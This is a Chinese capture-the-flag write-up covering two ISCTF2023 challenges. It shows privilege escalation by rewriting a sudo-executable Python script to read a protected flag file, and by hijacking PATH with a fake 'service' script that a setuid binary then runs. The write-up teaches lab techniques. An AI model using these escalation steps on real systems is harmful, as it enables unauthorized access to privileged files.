【ISCTF2023】MISC sudopy+status

sudopy

题目描述:

我们使用kali进行ssh连接

ssh -p 端口 用户@ip

 先查看一下本地有哪些文件

发现有一个flag文件,还有web.py文件

我们看题目sudopy

可以想到可能跟sudo有关,且利用py提权

sudo -l        # 列出用户权限或检查某个特定命令 

发现特定命令是使用python3运行web.py文件

web.py的文件权限允许我们读,我们看看里面写了什么内容

 简单看一下,会发现没有用,我们换一下思路,看看能不能重新编辑web.py文件

vim web.py

 把里面的内容修改为

import os

os.system('cat /home/ctf/flag')

我们执行一下

发现报错,我们跟个路径再执行一次

 完美解决!!!

status

看题目

还是一样的,我们先ssh连接 

 先看看本地有什么文件

 发现有个可执行还有s权限的checkgenshin文件,还有flag

我们先执行checkgenshin看看,会回显出什么

 * sshd is running

这一个回显,再结合题目status,可以想到是查看ssh服务的状态

我们先执行命令,验证一下是不是

service ssh status

这时候就能想到一种提权方法,环境变量,命令劫持

想都想到这了,我们试试

cd /tmp

echo 'cat /home/ctf/flag' > service

chmod +x service

export PATH=/tmp:$PATH

 

 我们执行一下checkgenshin文件

/home/ctf/checkgenshin

 

完美解决!!!

  • 15
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 5
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值